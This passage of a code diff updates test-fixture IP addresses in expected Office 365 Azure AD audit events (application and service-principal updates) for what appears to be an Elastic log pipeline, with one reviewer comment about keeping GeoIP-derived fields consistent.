me\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"corre
lationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": 
false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -5876,9 +5876,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:25:54", "ExtendedProperties": [ { 
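Review bot: The IP swap is only verifiably consistent for the three places visible in this hunk (`o365audit.ActorIpAddress`, `o365audit.ClientIP` and the same two values embedded in `event.original`); any ECS projection of that address the pipeline emits for this event — `client.ip`, `source.ip`, `related.ip` and any `*.geo.*` enrichment — lies outside the hunk and is not touched here. Since the changelog describes moving to the "supported subset", 67.43.156.15 presumably resolves in the test GeoIP database while 83.57.233.151 may not, so a hand-edited fixture would be left with stale or missing geo fields even though the raw strings line up. Regenerating the expected file with `elastic-package test pipeline -g` instead of editing the strings avoids that drift; if that is how this file was produced, nothing further is needed. The event object this hunk belongs to starts and ends outside the hunk.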
@@ -6081,7 +6081,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\
"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6111,9 +6111,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:25:54", "ExtendedProperties": [ { 
@@ -6328,7 +6328,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service 